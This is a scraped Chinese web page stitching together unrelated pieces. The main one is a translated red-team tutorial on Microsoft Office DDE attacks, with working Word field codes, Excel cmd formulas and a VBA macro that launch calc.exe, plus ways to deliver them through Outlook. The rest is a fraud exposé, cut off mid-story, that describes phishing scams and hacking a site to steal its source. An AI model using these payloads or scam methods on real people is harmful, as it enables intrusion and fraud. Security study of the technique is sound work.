src=&https://pic1.zhimg.com/v2-17ff27ca3c_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1153& data-rawheight=&393& class=&origin_image zh-lightbox-thumb& width=&1153& data-original=&https://pic1.zhimg.com/v2-17ff27ca3c_r.jpg&&&/figure&&p&打开官网拉到最下面,下载就行了:(安装的时候语言模式选择中文)&/p&&figure&&img src=&https://pic4.zhimg.com/v2-96ea4cea77_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&914& data-rawheight=&281& class=&origin_image zh-lightbox-thumb& width=&914& data-original=&https://pic4.zhimg.com/v2-96ea4cea77_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-1f90addfb824cfe_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&400& data-rawheight=&438& class=&content_image& width=&400&&&/figure&
良心软件三大特征:一是超好用!二是无广告!三是性价比高!说说我近几年爱上的五款软件(直接在官网打开即可,都可免费使用,有的也有付费版)简道云(地址:)适合:适用于各行各业,超自由的工作效率提高神器~这款软件是我今年才发现…
&p&微软的Office是在每个企业或组织中部署的常见应用程序。这种广泛的使用将微软的Office变成了一个可以用来执行攻击并使红队可以收集域哈希或执行任意代码的工具。&/p&&p&从历史上看,在微软的Office中执行代码是通过使用宏来执行的。然而,&a href=&https://link.zhihu.com/?target=https%3A//twitter.com/sensepost& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&SensePost&/a&发现了另一种使用DDE(动态数据交换)协议执行任意代码的方法。Office的产品内部有很多地方可以通过DDE来接受代码执行,本文将演示大部分这些攻击媒介。文章&a href=&https://link.zhihu.com/?target=https%3A//medium.com/red-team/dde-payloads-fcd& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&DDE Payloads&/a&可以与这篇文章一起用于生成有效载荷。&/p&&h2&&b&Word&/b&&/h2&&p&在微软Office Word中最简单的利用方法是插入字段码,这种方法由&a href=&https://link.zhihu.com/?target=https%3A//twitter.com/sensepost& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&SensePost&/a&发表的&a href=&https://link.zhihu.com/?target=https%3A//sensepost.com/blog/2017/macro-less-code-exec-in-msword/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&这篇文章&/a&描述过并且在公式内嵌入有效载荷。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&Insert-& Quick Parts-& Field
&/code&&/pre&&/div&&figure&&img src=&https://pic1.zhimg.com/v2-069ed477fe90_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&229& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic1.zhimg.com/v2-069ed477fe90_r.jpg&&&figcaption&Word – 通过字段码的DDE&/figcaption&&/figure&&p&在括号内添加以下有效内容将在下次打开文件时弹出一些对话框。如果用户选择“是”选项,则有效载荷将被执行。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&{DDEAUTO c:\\windows\\system32\\cmd.exe &/k
calc.exe&}
&/code&&/pre&&/div&&figure&&img src=&https://pic1.zhimg.com/v2-dac24e87abc67152f5aebf15a560092d_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&320& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic1.zhimg.com/v2-dac24e87abc67152f5aebf15a560092d_r.jpg&&&figcaption&Word – DDE有效载荷&/figcaption&&/figure&&p&或者,可以使用宏将有效载荷插入字段代码,正如&a href=&https://link.zhihu.com/?target=https%3A//twitter.com/cornerpirate& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Paul Ritchie&/a&在其&a href=&https://link.zhihu.com/?target=https%3A//www.secarma.co.uk/labs/is-dynamic-data-exchange-dde-injection-a-thing/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&博客中&/a&所描述的那样。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&''' Programmatically inserts a new field code into a word document at the current selection index.
''' This is of type &wdFieldDDEAuto& which is a field code which executes Dynamic Data Exchange (DDE)
''' When the document is opened. This includes an example PoC which launches calc.exe
Public Sub FieldCodeFun()
' Payload String
Dim payload As String
payload = &&&c:\\windows\\system32\\calc.exe&& &&/c calc.exe&&&
' Insert our payload as a field code
Selection.Collapse Direction:=wdCollapseEnd
ActiveDocument.Fields.Add Range:=Selection.Range, _
Type:=wdFieldDDEAuto, Text:=payload
&/code&&/pre&&/div&&figure&&img src=&https://pic2.zhimg.com/v2-afe1b86fb07ea2b87a9dd9_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&150& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic2.zhimg.com/v2-afe1b86fb07ea2b87a9dd9_r.jpg&&&figcaption&Word -通过宏执行DDE&/figcaption&&/figure&&p&上面演示的有效载荷只是执行了计算器,但可以修改它来包含任何其他有效载荷。&/p&&p&&a href=&https://link.zhihu.com/?target=https%3A//twitter.com/securitysift& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Mike Czumak&/a&做了一个很好的研究,在他的&a href=&https://link.zhihu.com/?target=https%3A//www.securitysift.com/abusing-microsoft-office-dde/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&博客中&/a&讨论了从外部托管的另一个Word文档中加载恶意的DDE。INCLUDE字段码可以与这个攻击向量和外部URL结合使用。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-cb02fd4170ceff7252ef_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&203& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic1.zhimg.com/v2-cb02fd4170ceff7252ef_r.jpg&&&figcaption&Word – 从另一个外部文档中加载DDE有效载荷&/figcaption&&/figure&&h2&&b&Excel&/b&&/h2&&p&在微软的Excel 中可以通过使用公式嵌入 DDE来执行有效载荷。以下两个公式都可以利用DDE执行代码(本例中为计算器),但是第二个公式会混淆对话框消息来更好的进行伪装来使其看起来更合理。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&=cmd|'/c calc.exe'!A1
=MSEXCEL|'......\Windows\System32\cmd.exe /c
calc.exe'!''
&/code&&/pre&&/div&&figure&&img src=&https://pic1.zhimg.com/v2-aa4f4b08a3f6a82ca7ce_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&171& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic1.zhimg.com/v2-aa4f4b08a3f6a82ca7ce_r.jpg&&&figcaption&Excel – DDE命令&/figcaption&&/figure&&p&当用户打开恶意的Excel电子表格时,将出现以下对话框。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-9f5c285cab5d337dd8ec_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&94& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic4.zhimg.com/v2-9f5c285cab5d337dd8ec_r.jpg&&&figcaption&Excel – DDE对话框&/figcaption&&/figure&&p&第二个公式仍将执行代码,但对话框中的消息内容将被修改,不是要求用户启动CMD.EXE,而是要求他启动MSEXCEL.exe。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-9ad265ae6e768ffba97f96ca51a02ec7_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&270& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic1.zhimg.com/v2-9ad265ae6e768ffba97f96ca51a02ec7_r.jpg&&&figcaption&Excel -第二个命令执行DDE&/figcaption&&/figure&&h2&&b&Outlook&/b&&/h2&&p&在Outlook中有很多位置可以利用DDE执行有效载荷。根据情况的不同,每种方法都可能有用。例如,如果已经获得了域凭据,则可能更容易伪造电子邮件并发送给多个其他用户,以便在企业或组织内获得更多的Shell。&/p&&p&&b&消息&/b&&/p&&p&发送包含DDE的Outlook消息也可以自动执行代码。这同样适用于以附件形式发送的电子邮件。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-8bbe07a92ae8bbc_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&278& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic3.zhimg.com/v2-8bbe07a92ae8bbc_r.jpg&&&figcaption&Outlook消息 – 执行DDE有效负载&/figcaption&&/figure&&p&但是,电子邮件信息需要以RTF格式(RTF)发送,并以RTF格式进行投递,因为某些邮件服务会将所有电子邮件转换为HTML,这将使DDE有效内容无效。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-064ec865a7e38e556c117b0da42647f9_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&188& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic4.zhimg.com/v2-064ec865a7e38e556c117b0da42647f9_r.jpg&&&figcaption&Outlook消息 – DDE和RTF&/figcaption&&/figure&&p&当消息到达受害者用户的收件箱时,DDE将在该消息被浏览时执行。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-a81b80c66424bed3dcfe8f30_b.jpg& data-size=&normal& data-rawwidth=&435& data-rawheight=&230& class=&origin_image zh-lightbox-thumb& width=&435& data-original=&https://pic4.zhimg.com/v2-a81b80c66424bed3dcfe8f30_r.jpg&&&figcaption&Outlook消息 – RTF电子邮件消息&/figcaption&&/figure&&p&&b&联系人&/b&&/p&&p&创建一个新的联系人或修改一个现有的联系人并将DDE载荷放入注释区域就可以导致执行代码。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-a0539bea9da98a2addbbe22619acfa91_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&231& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic2.zhimg.com/v2-a0539bea9da98a2addbbe22619acfa91_r.jpg&&&figcaption&Outlook – 联系人备注中的DDE负载&/figcaption&&/figure&&p&联系人需要发送给目标用户。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-2326fbd320fd57b53567_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&203& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic4.zhimg.com/v2-2326fbd320fd57b53567_r.jpg&&&figcaption&Outlook – 联系人注释区域的DDE代码执行&/figcaption&&/figure&&p&当用户打开联系人时,将执行嵌入的DDE有效载荷。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-a39a52f4bd2260c9eec19b_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&298& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic3.zhimg.com/v2-a39a52f4bd2260c9eec19b_r.jpg&&&figcaption&Outlook – DDE执行&/figcaption&&/figure&&p&&b&日历邀请&/b&&/p&&p&相同的思路可以适用于通过日历邀请的情况。如果用户与该邀请进行交互(打开或取消),则使用DDE有效载荷发送会议邀请就可以导致代码执行。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-ec028d52efc15bddc26a2c_b.jpg& data-size=&normal& data-rawwidth=&500& data-rawheight=&370& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&https://pic2.zhimg.com/v2-ec028d52efc15bddc26a2c_r.jpg&&&figcaption&Outlook -通过日历邀请嵌入DDE执行代码&/figcaption&&/figure&&h2&参考&/h2&&ul&&li&&a href=&https://link.zhihu.com/?target=https%3A//medium.com/red-team/dde-payloads-fcd& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&medium.com/red-team/dde&/span&&span class=&invisible&&-payloads-fcd&/span&&span class=&ellipsis&&&/span&&/a&&/li&&li&&a href=&https://link.zhihu.com/?target=http%3A//staaldraad.github.io//msword-field-codes/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&staaldraad.github.io/20&/span&&span class=&invisible&&17/10/23/msword-field-codes/&/span&&span class=&ellipsis&&&/span&&/a&&/li&&li&&a href=&https://link.zhihu.com/?target=http%3A//willgenovese.com/office-ddeauto-attacks/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&willgenovese.com/office&/span&&span class=&invisible&&-ddeauto-attacks/&/span&&span class=&ellipsis&&&/span&&/a&&/li&&li&&a href=&https://link.zhihu.com/?target=https%3A//www.secarma.co.uk/labs/is-dynamic-data-exchange-dde-injection-a-thing/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://www.&/span&&span class=&visible&&secarma.co.uk/labs/is-d&/span&&span class=&invisible&&ynamic-data-exchange-dde-injection-a-thing/&/span&&span class=&ellipsis&&&/span&&/a&&/li&&/ul&&blockquote&本文翻译自:&a href=&https://link.zhihu.com/?target=https%3A//pentestlab.blog//microsoft-office-dde-attacks/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&pentestlab.blog/2018/01&/span&&span class=&invisible&&/16/microsoft-office-dde-attacks/&/span&&span class=&ellipsis&&&/span&&/a& ,如若转载,请注明原文地址: &a href=&https://link.zhihu.com/?target=http%3A//www.4hou.com/technology/9974.html& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&4hou.com/technology/997&/span&&span class=&invisible&&4.html&/span&&span class=&ellipsis&&&/span&&/a& 更多内容请关注“嘶吼专业版”——Pro4hou&/blockquote&
微软的Office是在每个企业或组织中部署的常见应用程序。这种广泛的使用将微软的Office变成了一个可以用来执行攻击并使红队可以收集域哈希或执行任意代码的工具。从历史上看,在微软的Office中执行代码是通过使用宏来执行的。然而,发现了另一种使…
&figure&&img src=&https://pic3.zhimg.com/v2-6c63e163b27902bcaa3c_b.jpg& data-rawwidth=&1280& data-rawheight=&856& class=&origin_image zh-lightbox-thumb& width=&1280& data-original=&https://pic3.zhimg.com/v2-6c63e163b27902bcaa3c_r.jpg&&&/figure&&p&文/读者投稿(微信公众号:一本黑)&br&&/p&&p&责编/振宇、东东&/p&&p&【一本黑】媒体或商业转载必须获得授权,个人转发朋友圈无需授权。&/p&&p&&br&&/p&&p&&br&&/p&&p&当你知道了太多事实,你就会觉得目之所及的各种新闻都是一种虚假说辞,让我意识到一本黑不只要揭黑,更要维护事件的真貌。 &/p&&p&&br&&/p&&p&这次的推文来自一个混迹于黑产圈的读者投稿,谈到的所有内容都真实存在,作者不希望和黑产牵扯太多,所以文字由我稍作调整,用一个合适的角度呈现给大家。&/p&&p&&br&&/p&&p&文中涉及【交友】、【淘宝哥】、【黑卡】、【轻松筹】等四个黑产,其中”轻松筹“是该团伙的原创,而且至今还没有被大规模效仿。&/p&&p&&br&&/p&&p&这里的「交友」黑产此前已经被一本黑爆料过,而「淘宝哥」、「黑卡」和「轻松筹」此前并未在一本黑得到揭露,希望大家可以通篇读完,以防自己落入陷阱。&/p&&p&&br&&/p&&p&&br&&/p&&blockquote&&b&「交友黑产」&/b&&/blockquote&&p&&br&&/p&&p&故事始于16年的一个下雨天,我接到朋友的电话,朋友说“Am,现在有人给我介绍了个项目,据说一个微信号日产200!”&/p&&p&&br&&/p&&p&我瞬间就楞了,“日产200?骗人的吧!有这好事还轮的到你?”。&/p&&p&&br&&/p&&p&朋友认真地告诉我是真的,他们的工作室有几千台设备,日收入一直保持在几十万。&/p&&p&&br&&/p&&p&其实就是打着交友的旗号,用机器人和对方玩文字暧昧。&/p&&p&&br&&/p&&p&默认回几句就要求对方充值,除此之外,多人聊天、查看微信号、电话等信息也必须要花钱开通VIP,还为了打消对方顾虑说送100元话费,本质上就是诱惑用户充值,空手套白狼!&/p&&p&&br&&/p&&p&他接着说“这是在公众号上运营的,公众号需要开通微信支付,用群控操纵女微信号发朋友圈,一天站街5次,不需要加人就是为了展示给男性用户看,这些通过群控就可以完成。”&/p&&figure&&img src=&https://pic2.zhimg.com/v2-ca8f487e2baee37c5096_b.jpg& data-size=&normal& data-rawwidth=&348& data-rawheight=&620& class=&content_image& width=&348&&&figcaption&(图片来源于网络)&/figcaption&&/figure&&p&(
站街是一种营销手段,主要是利用社交软件附近的人功能,用站点的方式来曝光自己。在附近的人功能里面让自己被别人搜到,就能让人看到你打的广告,从而进行推广。这个方法在QQ作为主流IM工具的时候就已经出现。)&/p&&p&&br&&/p&&p&电话里不方便聊太多,我们晚上专门找了个地方边喝酒边谈。&/p&&p&&br&&/p&&p&酒桌上朋友拿着手机给我展示着所谓的 “同城交友”。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-379eadf34a_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&1237& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic2.zhimg.com/v2-379eadf34a_r.jpg&&&/figure&&p&&br&&/p&&p&既要赚足男性眼球,又不想冒涉黄的风险,他们在图片的选择上下了不少功夫。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-fe567e59d19f15e802a7c0b_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&1235& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic1.zhimg.com/v2-fe567e59d19f15e802a7c0b_r.jpg&&&/figure&&p&尽管运作模式粗放甚至漏洞百出,但是依然可以促使不少的男性付费。&/p&&p&&br&&/p&&p&虽然看起来不可思议,但是色流一直是互联网的一股庞大的暗黑流量,只要和色沾边的内容总能享受到流量上的优待。&/p&&p&&br&&/p&&p&世界最大的成人网站可以在alexa流量排行榜上一直保持在前三十名,播放量常年在50亿左右,所以色流的力量不容小觑。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-0b29e3e6ae2acbfc0576e8c_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&640& data-rawheight=&129& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic2.zhimg.com/v2-0b29e3e6ae2acbfc0576e8c_r.jpg&&&/figure&&p&既然话已至此,我直接问他“你告诉我这些,是打算让我帮你什么?”朋友告诉我,他现在只是个代理,上家(运营者)会抽走4成的利润,所以想拿了源码单干。&/p&&p&&br&&/p&&p&言外之意,就是想让我从服务器里把源码拖出来。(用老师傅的话来说:“搞定了服务器,你就可以为所欲为”)&/p&&p&&br&&/p&&p&他留下网址和后台账号,回去等我的消息。&/p&&p&&br&&/p&&p&&b&「交友黑产」之盗取源码&/b&&/p&&p&&br&&/p&&p&其实那时我也并没有十分的把握,毕竟技术上的东西现在很少碰了,内心既担心技艺生疏又怀着一种重出江湖的兴奋。&/p&&p&&br&&/p&&p&时间随着键盘的敲击声慢慢流逝,经过多种尝试,终于在上传头像的功能里找到了一个开发者没有留意的漏洞,这个漏洞不止让我拿下了网站拖出源码,同时,让我在数据库里看到了令人吃惊的数据。&/p&&p&&br&&/p&&p&&b&日注册用户有7万多人,付费率高达将近80%!&/b&&/p&&p&&br&&/p&&p&总后台可以看到机器人的设置,里面都是设置好的文本发送还有关键词回复,因为关键词回复工程量太大,只能设置一些通用的关键词,所以说不了两句就要求充值。(由于时间久远,数据的图片已经找不到了。)&/p&&p&&br&&/p&&p&照片和语音都有专门的文件夹,头像和照片都是套图,这些可怜的男同胞花了钱其实也只是在和代码聊天。&/p&&p&&br&&/p&&p&我将源码打包发给了他,并约他第二天见面。&/p&&p&&br&&/p&&p&&b&「交友黑产」之走访工作室&/b&&/p&&p&&br&&/p&&p&第二天见面后我提出“能带我去做这个项目的工作室参观一下吗?我想看看有多少台设备。”&/p&&p&&br&&/p&&p&朋友没有拒绝,但是提醒我隐藏身份,假装成也想做这个项目的人。&/p&&p&&br&&/p&&p&路上我随口问了一句“是不是有几百台设备在跑?”这次他的回答让我彻底奔溃了,“几百台?&b&做这个项目已经不按台算了,按楼层来算!我们有2层!”&/b&&/p&&p&&br&&/p&&p&来到工作室我才明白,这里和网上所看到的图片根本不能相提并论,一排排设备挂满了所有的架子。房间里48口充电器的散热风扇发出恼人的轰鸣声,其间还夹杂着每次持续几秒钟的叮咚声。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-2a9edfd462_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&1183& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic2.zhimg.com/v2-2a9edfd462_r.jpg&&&/figure&&p&为了不引起怀疑,照片没敢多拍。&/p&&p&那天的心情已经无法用语言来形容,何况这种规模的工作室还不止一家。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-f9cddee109_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&540& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic3.zhimg.com/v2-f9cddee109_r.jpg&&&/figure&&p&当时心里百感交集,做什么毛生意不如买几十台设备做这项目,一个月能顶得上我一年的收入了。&/p&&p&&br&&/p&&p&从工作室出来,我压抑不住好奇,追问他这个项目是从何流出的?如此赚钱的门道谁又会到处宣扬?&/p&&p&&br&&/p&&p&然而,与其说他给了我一个答案,不如说他的回答又给我打开了一扇门,一扇关于&b&电信诈骗,买卖数据,制作黑卡的大门…&/b&&/p&&p&&br&&/p&&blockquote&&b&「全镇武装的“淘宝哥”诈骗黑产」&/b&&/blockquote&&p&&br&&/p&&p&“这个思路是XX市的「淘宝哥」传出来的!他们中有人转型做交友,买设备的时候走漏了这个项目的模式。”&/p&&p&&br&&/p&&p&我继续追问他“淘宝哥是什么?是开淘宝店的吗?”&/p&&p&&br&&/p&&p&朋友深吸一口气“&b&淘宝哥就是通过某些渠道买到淘宝客户数据的人,这些数据精确到消费时间、地址、姓名、电话。拿到数据之后,会开始对目标进行诈骗。”&/b&&/p&&p&&br&&/p&&p&“首先,淘宝哥(骗子)会打电话给目标,自称是网店的客服人员,通知你因为淘宝网支付系统出了点问题,目前该笔交易资金已经被冻结,希望你申请退款,退款成功后再重新交易。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-67e823bc480cca4b990bc_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&640& data-rawheight=&299& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic1.zhimg.com/v2-67e823bc480cca4b990bc_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-ee79a3cb819eaefa519540d_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&640& data-rawheight=&299& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic3.zhimg.com/v2-ee79a3cb819eaefa519540d_r.jpg&&&/figure&&p&&br&&/p&&p&期间他们会不断使用话术博取你的信任。&/p&&p&&br&&/p&&p&之后,让你加客服QQ并且给你发送钓鱼网址让你申请退款。&/p&&p&&br&&/p&&p&电话里他们不停地对目标洗脑,诱导你把手机号和验证码都填进去。&/p&&p&&br&&/p&&p&在你点击确认退款后,骗子就得到了你输入的所有信息!”&/p&&figure&&img src=&https://pic2.zhimg.com/v2-05fa92019d7febc908c60fc_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&640& data-rawheight=&308& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic2.zhimg.com/v2-05fa92019d7febc908c60fc_r.jpg&&&/figure&&p&听到这些我内心一直无法平复,“这些人就不怕再出一次“徐玉玉”事件吗?”&/p&&p&&br&&/p&&p&朋友一遍点着烟一遍跟我讲,“任何行业都有自己的准则,就算是黑产也是盗亦有道。&/p&&p&&br&&/p&&p&淘宝哥的准则就是不对学生下手,假如事后才知道,也会把钱还给他们。&/p&&p&&br&&/p&&p&有时碰到真的家里困难的,面对学生的哀求,淘宝哥还可能多退几千回去,毕竟都是穷人出身,都明白个中的辛酸。&/p&&p&&br&&/p&&p&当然,个别不守原则的人就另当别论。”&/p&&p&&br&&/p&&p&这时我想的是这TM的做诈骗还分有没有原则?&/p&&p&&br&&/p&&p&朋友叹着气告诉我“大多数淘宝哥会告诉自己,即便我不骗他,也有人会去骗。&/p&&p&&br&&/p&&p&平时可能还会去烧香拜佛,做这些都是为了让自己内心舒服点。”&/p&&p&&br&&/p&&p&“这些数据是怎么来的,是不是商家自己出售客户的信息?”。&/p&&p&&br&&/p&&p&他冷笑了一声:“&b&这些数据也是一条黑色产业链,批发这些数据的boss会把自己的小弟安插在快递公司,淘宝商家里头上班。&/b&&/p&&p&&br&&/p&&p&“更厉害的人会绕过360等主流杀毒软件,把木马发给淘宝商家的客服,从他们电脑上窃取数据。&/p&&p&&br&&/p&&p&&b&“除此以外,可能还有一些阿里的内部人员会把这些数据提供给一些商家,这些商家用完再出售一遍,拿到这些数据的二手贩子再把数据出售给诈骗团伙。”&/b&&/p&&figure&&img src=&https://pic1.zhimg.com/v2-432cb1edb3bbcda8c16c67d2e8240817_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&478& data-rawheight=&246& class=&origin_image zh-lightbox-thumb& width=&478& data-original=&https://pic1.zhimg.com/v2-432cb1edb3bbcda8c16c67d2e8240817_r.jpg&&&/figure&&p&“我们那有一个镇子,里面的年轻人基本都在山上做这个。遇到有外人去他们那里,村民都会问他们过来做什么的。如果发现不对劲会马上散出消息保护淘宝哥全身而退,还有的人会雇佣一些镇上的人在各个地方当眼线。”&/p&&p&&br&&/p&&p&当时我就像是小孩听大人讲故事一样听着。没想到这诈骗的团队已经庞大到了一个镇,而且还有村民、眼线帮他们当哨兵。&/p&&p&&br&&/p&&p&从窃取数据到诈骗,整条产业链分工是多么的明确。&/p&&p&&br&&/p&&p&打听了一下,运气好的淘宝哥日产能有几十万,保守计算,一个团伙月收上亿不是问题。&/p&&p&&br&&/p&&p&据我所知,为了应对执法打击,淘宝哥的诈骗套路也在不断更新。&/p&&p&&br&&/p&&p&诈骗的法律风险还是太高,很多人开始调整方向,前文提到的「交友」就因此而生。&/p&&p&&br&&/p&&p&&br&&/p&&p&&br&&/p&&blockquote&&b&「黑卡」黑产的必备工具&/b&&/blockquote&&p&&br&&/p&&p&这就让我想到一个新问题,「交友」早期是在公众号运营,现在转向app,但是这些都是需要开通微信支付或者支付宝支付的,他们肯定不会用自己真实的公司去申请。&/p&&p&&br&&/p&&p&那么黑产就需要大量的工商注册信息。&/p&&p&&br&&/p&&p&这里用到的工具就是黑产的必备工具——黑卡。黑卡与绝大多数的黑产紧密相连,可以说是黑产的最重要环节!&/p&&p&&br&&/p&&p&这里的黑卡不是那种土豪专属的银行黑卡,而是黑产收钱用的黑卡!&/p&&p&&br&&/p&&p&&b&黑卡一般是以套为单位出现,包含身份证,银行卡,手机卡,U盾,被称为四大件。&/b&&/p&&p&&br&&/p&&p&黑产团伙就是拿着这四大件去办理个体商业户,成本不等,再用商户资料去开通公众号的微信支付。&/p&&p&&br&&/p&&p&这里面的银行卡和电话卡也都是淘宝哥常用的作案工具,确保不会留下和自己有关的痕迹。&/p&&p&&br&&/p&&p&黑产对黑卡的需求量很大,手握几百套黑卡是业界平均水平。&/p&&p&&br&&/p&&p&通过几个黑市卖家,我了解到了黑卡的来源。&/p&&p&&br&&/p&&p&以前,银行还没有人脸识别系统,黑产会专门找人出去收身份证,然后让长得像的人去办卡。&/p&&p&&br&&/p&&p&但是现在银行启用了人脸识别,所以黑产也换了方法。&/p&&p&&br&&/p&&p&他们专门在类似网吧这样的场所,寻找不务正业游手好闲的年轻人(其中还有吸毒者),然后支付100-300元的报酬让他们去办卡,这些卡就是日后黑产用的黑卡。&/p&&p&&br&&/p&&p&那些好吃懒做拿着钱就跑去上网,不然就是有染上毒瘾的人,这类群体为了钱什么都敢做。&/p&&p&&br&&/p&&p&&br&&/p&&p&&br&&/p&&blockquote&&b&「市场风云变化,黑产手法也不断升级」&/b&&/blockquote&&p&&br&&/p&&p&正邪一直在相互抗衡,市场也在不断变化。&/p&&p&&br&&/p&&p&&b&腾讯封杀交友类的公众号,黑卡也被打压了&/b&,但是道高一尺,魔高一丈,交友从公众号转型为APP,而黑卡也从身份证原件变为了复印件。&/p&&p&&br&&/p&&p&如今网络安全逐步升级,钓鱼网站逐渐没落。&/p&&p&&br&&/p&&p&现在,淘宝哥很少以“支付系统出问题”做理由,而是用“产品质量有问题可能引起过敏”等做为理由,告知受害者需要退款,然后借机&b&询问芝麻信用的分数,如果符合条件就开始诱导受害者开通借呗,网商贷,招联好期贷等借款服务。&/b&&/p&&p&&br&&/p&&p&再告诉受害者钱已经退到这里面,让用户去注册查看,不知情的用户看见里面居然有上万元也很吃惊。&/p&&p&&br&&/p&&p&然而“客服”却可怜巴巴的说是退款退错了,希望你能扣除原有的商品价格将剩余的还给他。&/p&&p&&br&&/p&&p&善良的受害者如同淘宝哥手上的玩物,被耍的团团转。&/p&&p&&br&&/p&&p&数日之后,当受害者收到催款短信方才如梦初醒。&/p&&p&&br&&/p&&p&此时的我已经觉得自己看待事物的方式大有变化,混入了黑产界的“江湖”,假装自己是个小白获取小道消息,慢慢让我成为了黑产界的百晓生。&/p&&p&&br&&/p&&p&然而,过了一年我再次发现一个更为黑暗的产业。。。&/p&&p&&br&&/p&&p&&br&&/p&&p&&br&&/p&&blockquote&&b&「轻松筹,到底是轻松筹还是 “轻松”筹?」&/b&&/blockquote&&p&&br&&/p&&p&时正三月,刚好点开了家人发的一条轻松筹筹款的朋友圈。
